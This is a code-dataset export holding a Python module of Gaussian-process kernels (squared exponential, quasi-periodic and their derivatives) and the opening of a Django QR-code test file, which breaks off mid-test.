hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f60a93633ec0cdca46c588929e221bac483a4f51 | 18,604 | py | Python | miniframe/kernels.py | jdavidrcamacho/mini-frame | a07b9ef83f57ae1a7178e73092297ca8b68a845e | [
"MIT"
] | 3 | 2018-12-11T20:53:42.000Z | 2021-11-04T16:23:34.000Z | miniframe/kernels.py | jdavidrcamacho/mini-frame | a07b9ef83f57ae1a7178e73092297ca8b68a845e | [
"MIT"
] | 6 | 2018-03-06T20:17:56.000Z | 2018-06-22T13:02:03.000Z | miniframe/kernels.py | jdavidrcamacho/mini-frame | a07b9ef83f57ae1a7178e73092297ca8b68a845e | [
"MIT"
] | 1 | 2018-03-06T20:13:55.000Z | 2018-03-06T20:13:55.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
pi = np.pi
class kernel(object):
""" Definition the base kernel class """
is_kernel = True
def __init__(self, *args):
""" Puts all kernel arguments in an array pars """
self.pars = np.array(args)
def __call__(self, r):
""" r = t - t' """
raise NotImplementedError
def __add__(self, b):
if not hasattr(b, "is_kernel"):
return Sum(Constant(c=float(b)), self)
return Sum(self, b)
def __radd__(self, b):
return self.__add__(b)
def __mul__(self, b):
if not hasattr(b, "is_kernel"):
return Product(Constant(c=float(b)), self)
return Product(self, b)
def __rmul__(self, b):
return self.__mul__(b)
def __repr__(self):
""" Representation of each kernel instance """
return "{0}({1})".format(self.__class__.__name__,
", ".join(map(str, self.pars)))
class _operator(kernel):
""" To allow operations between two kernels """
def __init__(self, k1, k2):
self.k1 = k1
self.k2 = k2
@property
def pars(self):
return np.append(self.k1.pars, self.k2.pars)
class Sum(_operator):
""" Sum of two kernels """
def __repr__(self):
return "{0} + {1}".format(self.k1, self.k2)
def __call__(self, r):
return self.k1(r) + self.k2(r)
class Product(_operator):
""" Product of two kernels """
def __repr__(self):
return "{0} * {1}".format(self.k1, self.k2)
def __call__(self, r):
return self.k1(r) * self.k2(r)
class Constant(kernel):
""" This kernel returns its constant argument c """
def __init__(self, c):
super(Constant, self).__init__(c)
self.c = c
def __call__(self, r):
return self.c * np.ones_like(r)
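# --- Illustrative sketch (not part of the original module): how the kernel
# algebra above composes. Scalars are promoted to Constant by __add__/__mul__,
# Sum/Product evaluate both operands element-wise, and _operator.pars
# concatenates the parameter arrays of the operands. The helper below is
# hypothetical and only added for illustration.
def _demo_kernel_algebra():
    r = np.linspace(-1.0, 1.0, 5)
    k = 2.0 * Constant(c=1.0) + Constant(c=0.5)  # Product(...) wrapped in a Sum
    assert np.allclose(k(r), 2.5)                # 2*1 + 0.5 for every element of r
    return k.pars                                # array([2., 1., 0.5])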
# Squared exponential kernel
class SquaredExponential(kernel):
"""
Squared Exponential kernel, also known as the radial basis function
(RBF) kernel in other works.
Parameters:
ell: float
Length-scale, lambda in the paper
wn: float
White noise amplitude
"""
def __init__(self, ell, wn):
super(SquaredExponential, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r**2
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return np.exp(-0.5 *f1/f2) + fwn
except ValueError:
f1 = r**2
f2 = self.ell**2
return np.exp(-0.5 *f1/f2)
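# --- Illustrative sketch (not part of the original module): evaluating the kernel
# on a matrix of time differences r_ij = t_i - t_j. For 2-D input the try branch
# adds the wn**2 white-noise term on the diagonal only; for scalar input np.diag
# raises ValueError and the noise-free expression is returned instead. The helper
# below is hypothetical and only added for illustration.
def _demo_squared_exponential():
    t = np.linspace(0.0, 1.0, 4)
    r = t[:, None] - t[None, :]                  # 4x4 matrix of time differences
    k = SquaredExponential(ell=0.5, wn=0.1)
    cov = k(r)                                   # 4x4 covariance matrix
    assert np.allclose(np.diag(cov), 1.0 + 0.1**2)
    return cov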
class dSE_dt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel with respect to t1.
"""
def __init__(self, ell, wn):
super(dSE_dt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return -f1/f2 *np.exp(-0.5*f1*f1/f2) + fwn
except ValueError:
f1 = r
f2 = self.ell**2
return -f1/f2 *np.exp(-0.5*f1*f1/f2)
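# --- Illustrative sketch (not part of the original module): a central-difference
# check that dSE_dt1 is the derivative of SquaredExponential with respect to t1,
# under the convention r = t1 - t2 used throughout this module. The helper below
# is hypothetical and only added for illustration.
def _check_dSE_dt1(t1=0.3, t2=1.1, ell=0.7, eps=1e-6):
    se = SquaredExponential(ell=ell, wn=0.0)
    dse = dSE_dt1(ell=ell, wn=0.0)
    fd = (se((t1 + eps) - t2) - se((t1 - eps) - t2)) / (2.0 * eps)
    assert abs(fd - dse(t1 - t2)) < 1e-6
    return fd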
class dSE_dt2(SquaredExponential):
"""
Derivative of the SquaredExponential kernel with respect to t2.
"""
def __init__(self, ell, wn):
super(dSE_dt2, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return f1/f2 *np.exp(-0.5*f1*f1/f2) + fwn
except ValueError:
f1 = r
f2 = self.ell**2
return f1/f2 *np.exp(-0.5*f1*f1/f2)
class ddSE_dt2dt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, one time with respect to t1 and
another with respect to t2.
"""
def __init__(self, ell, wn):
super(ddSE_dt2dt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r**2
f2 = self.ell**2
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (1.0/f2 -f1/f2**2) *np.exp(-0.5*f1/f2) + fwn
except ValueError:
f1 = r**2
f2 = self.ell**2
return (1.0/f2 -f1/f2**2) *np.exp(-0.5*f1/f2)
class dddSE_dt2ddt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, two times with respect to t1 and
one with respect to t2.
"""
def __init__(self, ell, wn):
super(dddSE_dt2ddt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (f111/f222 -3.0*f1/f22) *np.exp(-0.5*f11/f2) + fwn
except ValueError:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
return (f111/f222 -3.0*f1/f22) *np.exp(-0.5*f11/f2)
class dddSE_ddt2dt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, one time with respect to t1 and
two times with respect to t2. Equation A6 in the paper, for N=1.
"""
def __init__(self, ell, wn):
super(dddSE_ddt2dt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (-f111/f222 +3.0*f1/f22) *np.exp(-0.5*f11/f2) + fwn
except ValueError:
f1 = r
f11 = r**2
f111 = r**3
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
return (-f111/f222 +3.0*f1/f22) *np.exp(-0.5*f11/f2)
class ddddSE_ddt2ddt1(SquaredExponential):
"""
Derivative of the SquaredExponential kernel, two times with respect to t1 and
two times with respect to t2. Equation A6 in the paper, for N=1.
"""
def __init__(self, ell, wn):
super(ddddSE_ddt2ddt1, self).__init__(ell, wn)
self.ell = ell
self.wn = wn
def __call__(self, r):
try:
f1 = r**2
f11 = r**4
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
f2222 = self.ell**8
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (f11/f2222 -6.0*f1/f222 +3.0/f22) *np.exp(-0.5*f1/f2) + fwn
except ValueError:
f1 = r**2
f11 = r**4
f2 = self.ell**2
f22 = self.ell**4
f222 = self.ell**6
f2222 = self.ell**8
return (f11/f2222 -6.0*f1/f222 +3.0/f22) *np.exp(-0.5*f1/f2)
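# --- Illustrative sketch (not part of the original module): a finite-difference
# check of the mixed derivative ddSE_dt2dt1 (once with respect to t1, once with
# respect to t2), again with r = t1 - t2. The helper below is hypothetical and
# only added for illustration.
def _check_ddSE_dt2dt1(t1=0.3, t2=1.1, ell=0.7, eps=1e-4):
    se = SquaredExponential(ell=ell, wn=0.0)
    dd = ddSE_dt2dt1(ell=ell, wn=0.0)
    fd = (se((t1 + eps) - (t2 + eps)) - se((t1 + eps) - (t2 - eps))
          - se((t1 - eps) - (t2 + eps)) + se((t1 - eps) - (t2 - eps))) / (4.0 * eps**2)
    assert abs(fd - dd(t1 - t2)) < 1e-5
    return fd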
# Quasi-periodic kernel
class QuasiPeriodic(kernel):
"""
This kernel is the product of the exponential sine squared kernel and
the squared exponential kernel. It is known as the quasi-periodic kernel.
Equation 27 in the paper.
Parameters
----------
theta: float
Kernel amplitude
ell_e: float
Evolutionary time scale
ell_p: float
Length scale of the periodic component
Period: float
Kernel periodicity
wn: float
White noise amplitude
"""
def __init__(self, ell_e, ell_p, period, wn):
super(QuasiPeriodic, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return np.exp( -(2.0*f5*f5/f2) -0.5*f1*f1/f3 ) + fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
return np.exp( -(2.0*f5*f5/f2) -0.5*f1*f1/f3)
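# --- Illustrative sketch (not part of the original module): building a
# quasi-periodic covariance matrix. Parameter values are arbitrary and only
# chosen for illustration; the hypothetical helper below is not part of the API.
def _demo_quasi_periodic():
    t = np.linspace(0.0, 10.0, 6)
    r = t[:, None] - t[None, :]
    k = QuasiPeriodic(ell_e=20.0, ell_p=0.5, period=3.2, wn=0.01)
    cov = k(r)                                   # 6x6 covariance, wn**2 on the diagonal
    assert np.allclose(np.diag(cov), 1.0 + 0.01**2)
    return cov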
class dQP_dt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, with respect to t1. Equation A8 in the
paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dQP_dt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( - 2.0*f5*f5/f2 - 0.5*f1*f1/f3 )
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (-(4*pi*f5*f6)/(f2*f4) -f1/f3) *f7 +fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( - 2.0*f5*f5/f2 - 0.5*f1*f1/f3 )
return (-(4*pi*f5*f6)/(f2*f4) -f1/f3) *f7
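# --- Illustrative sketch (not part of the original module): a central-difference
# check that dQP_dt1 differentiates QuasiPeriodic with respect to t1 (r = t1 - t2).
# The helper below is hypothetical and only added for illustration.
def _check_dQP_dt1(t1=0.4, t2=1.3, eps=1e-6):
    pars = dict(ell_e=20.0, ell_p=0.5, period=3.2, wn=0.0)
    qp = QuasiPeriodic(**pars)
    dqp = dQP_dt1(**pars)
    fd = (qp((t1 + eps) - t2) - qp((t1 - eps) - t2)) / (2.0 * eps)
    assert abs(fd - dqp(t1 - t2)) < 1e-5
    return fd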
class dQP_dt2(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, with respect to t2. Equation A9 in the
paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dQP_dt2, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
fwn = self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return ((4*pi*f5*f6)/(f2*f4) +f1/f3) *f7 +fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
return ((4*pi*f5*f6)/(f2*f4) +f1/f3) *f7
class ddQP_dt2dt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, one time with respect to t1 and another
with respect to t2. Equation A10 in the paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(ddQP_dt2dt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
f8 = (-(4*pi*f5*f6)/(f2*f4) - f1/f3)
f9 = ((4*pi*f5*f6)/(f2*f4) + f1/f3)
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (f8*f9 +1.0/f3 +4*pi*pi*f6*f6/(f2*f4*f4) \
-4*pi*pi*f5*f5/(f2*f4*f4)) *f7 +fwn
except ValueError:
f1 = r
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f5 = np.sin(pi*f1/f4)
f6 = np.cos(pi*f1/f4)
f7 = np.exp( -(2.0*f5*f5/f2) - 0.5*f1*f1/f3 )
f8 = (-(4*pi*f5*f6)/(f2*f4) - f1/f3)
f9 = ((4*pi*f5*f6)/(f2*f4) + f1/f3)
return (f8*f9 +1.0/f3 +4*pi*pi*f6*f6/(f2*f4*f4) \
-4*pi*pi*f5*f5/(f2*f4*f4)) *f7
class dddQP_dt2ddt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, two times with respect to t1 and one
time with respect to t2. Equation A10 in the paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dddQP_dt2ddt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_e = ell_e
self.ell_p = ell_p
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7 +fwn
except ValueError:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
return (j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7
class dddQP_ddt2dt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, one time with respect to t1
and two times with respect to t2. Equation A10 in the paper.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(dddQP_ddt2dt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_p = ell_p
self.ell_e = ell_e
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return -(j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7 +fwn
except ValueError:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -(2.0*f55/f2) - 0.5*f11/f3 )
j1 = -1/f3 -4*pi*pi*f66/(f2*f44) +4*pi*pi*f55/(f2*f44)
j2 = f1/f3 + 4*pi*f5*f5/(f2*f4)
j3 = (-j2)**2
j4 = j2
j5 = -j1
j6 = -j2
j8 = 16*pi*pi*pi*f6*f5/(f2*f444)
return -(j1*j2 + j3*j4 + 2*j5*j6 - j8) *f7
class ddddQP_ddt2ddt1(QuasiPeriodic):
"""
Derivative of the QuasiPeriodic kernel, two times with respect to t1
and two times with respect to t2. Equation A6 in the paper, for N=1.
"""
def __init__(self, ell_e, ell_p, period, wn):
super(ddddQP_ddt2ddt1, self).__init__(ell_e, ell_p, period, wn)
self.ell_p = ell_p
self.ell_e = ell_e
self.period = period
self.wn = wn
def __call__(self, r):
try:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f4444 = self.period**4
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -0.5*f11/f3 - 2*f55/f2)
j1 = 1./f3 + 4*pi*pi*f66/(f2*f44) - 4*pi*pi*f55/(f2*f44)
j2 = -f1/f3 - 4*pi*f6*f5/(f2*f4)
j3 = f1/f3 + 4*pi*f6*f5/(f2*f4)
j4 = 32*pi*pi*pi*f6*f5*j3/(f2*f444)
j5 = 32*pi*pi*pi*f6*f5*j2/(f2*f444)
j6 = 16*pi*pi*pi*pi*f55/(f2*f4444)
j7 = 16*pi*pi*pi*pi*f66/(f2*f4444)
j8 = -j1
j9 = j3**2
j10 = j2**2
j11 = (-j1)**2
fwn=self.wn**2 *np.diag(np.diag(np.ones_like(r)))
return (4*j1*j2*j3 -j4 +j5 -j6 +j7 +j8*j9 \
+j10*j9 +j8*j10 +j11 +2*j1**2) *f7 +fwn
except ValueError:
f1 = r
f11 = r**2
f2 = self.ell_p**2
f3 = self.ell_e**2
f4 = self.period
f44 = self.period**2
f444 = self.period**3
f4444 = self.period**4
f5 = np.sin(pi*f1/f4)
f55 = np.sin(pi*f1/f4)**2
f6 = np.cos(pi*f1/f4)
f66 = np.cos(pi*f1/f4)**2
f7 = np.exp( -0.5*f11/f3 - 2*f55/f2)
j1 = 1./f3 + 4*pi*pi*f66/(f2*f44) - 4*pi*pi*f55/(f2*f44)
j2 = -f1/f3 - 4*pi*f6*f5/(f2*f4)
j3 = f1/f3 + 4*pi*f6*f5/(f2*f4)
j4 = 32*pi*pi*pi*f6*f5*j3/(f2*f444)
j5 = 32*pi*pi*pi*f6*f5*j2/(f2*f444)
j6 = 16*pi*pi*pi*pi*f55/(f2*f4444)
j7 = 16*pi*pi*pi*pi*f66/(f2*f4444)
j8 = -j1
j9 = j3**2
j10 = j2**2
j11 = (-j1)**2
return (4*j1*j2*j3 -j4 +j5 -j6 +j7 +j8*j9 \
+j10*j9 +j8*j10 +j11 +2*j1**2) *f7
| 30.054927 | 83 | 0.480596 | 2,847 | 18,604 | 3.008781 | 0.067088 | 0.074364 | 0.026617 | 0.021013 | 0.833761 | 0.827457 | 0.8152 | 0.803993 | 0.803993 | 0.761382 | 0 | 0.116901 | 0.372823 | 18,604 | 618 | 84 | 30.10356 | 0.617244 | 0.118147 | 0 | 0.793333 | 0 | 0 | 0.002872 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095556 | false | 0 | 0.002222 | 0.017778 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f6596a4dd489e707722a249e6e4933745bd6c60e | 165,429 | py | Python | qr_code/tests/tests.py | HackRoboy/CoinBoy | 5e10e763fe2e1e492f733fdf2531c77f13cef3a4 | [
"BSD-3-Clause"
] | null | null | null | qr_code/tests/tests.py | HackRoboy/CoinBoy | 5e10e763fe2e1e492f733fdf2531c77f13cef3a4 | [
"BSD-3-Clause"
] | null | null | null | qr_code/tests/tests.py | HackRoboy/CoinBoy | 5e10e763fe2e1e492f733fdf2531c77f13cef3a4 | [
"BSD-3-Clause"
] | null | null | null | """Tests for qr_code application."""
import base64
import re
import os
from datetime import date
from django.template import Template, Context
from django.test import SimpleTestCase, override_settings
from django.utils.safestring import mark_safe
from django.utils.html import escape
from qr_code.qrcode.image import SVG_FORMAT_NAME, PNG_FORMAT_NAME
from qr_code.qrcode.maker import make_embedded_qr_code
from qr_code.qrcode.constants import ERROR_CORRECTION_DICT, DEFAULT_IMAGE_FORMAT, DEFAULT_MODULE_SIZE, \
DEFAULT_ERROR_CORRECTION, DEFAULT_VERSION
from qr_code.qrcode.serve import make_qr_code_url
from qr_code.qrcode.utils import ContactDetail, WifiConfig, QRCodeOptions, Coordinates
from qr_code.templatetags.qr_code import qr_from_text, qr_url_from_text
BASE64_PNG_IMAGE_TEMPLATE = '<img src="data:image/png;base64, %s" alt="Hello World!">'
TEST_TEXT = 'Hello World!'
COMPLEX_TEST_TEXT = '/%+¼@#=<>àé'
TEST_CONTACT_DETAIL = dict(
first_name='John',
last_name='Doe',
first_name_reading='jAAn',
last_name_reading='dOH',
tel='+41769998877',
email='j.doe@company.com',
url='http://www.company.com',
birthday=date(year=1985, month=10, day=2),
address='Cras des Fourches 987, 2800 Delémont, Jura, Switzerland',
memo='Development Manager',
org='Company Ltd',
)
TEST_WIFI_CONFIG = dict(
ssid='my-wifi',
authentication=WifiConfig.AUTHENTICATION.WPA,
password='wifi-password'
)
OVERRIDE_CACHES_SETTING = {'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', },
'qr-code': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'qr-code-cache', 'TIMEOUT': 3600}}
SVG_REF_SUFFIX = '.ref.svg'
PNG_REF_SUFFIX = '.ref.png'
def get_resources_path():
tests_dir = os.path.dirname(os.path.abspath(__file__))
resources_dir = os.path.join(tests_dir, 'resources')
return resources_dir
def _make_closing_path_tag(svg):
return svg.replace(' /></svg>', '></path></svg>')
class TestApps(SimpleTestCase):
def test_apps_attributes(self):
from qr_code.apps import QrCodeConfig
self.assertEqual(QrCodeConfig.name, 'qr_code')
self.assertEqual(QrCodeConfig.verbose_name, 'Django QR code')
class TestQRCodeOptions(SimpleTestCase):
def test_qr_code_options(self):
with self.assertRaises(ValueError):
QRCodeOptions(foo='bar')
options = QRCodeOptions()
self.assertEqual(options.border, 4)
self.assertEqual(options.size, DEFAULT_MODULE_SIZE)
self.assertEqual(options.image_format, DEFAULT_IMAGE_FORMAT)
self.assertEqual(options.version, DEFAULT_VERSION)
self.assertEqual(options.error_correction, DEFAULT_ERROR_CORRECTION)
options = QRCodeOptions(image_format='invalid-image-format')
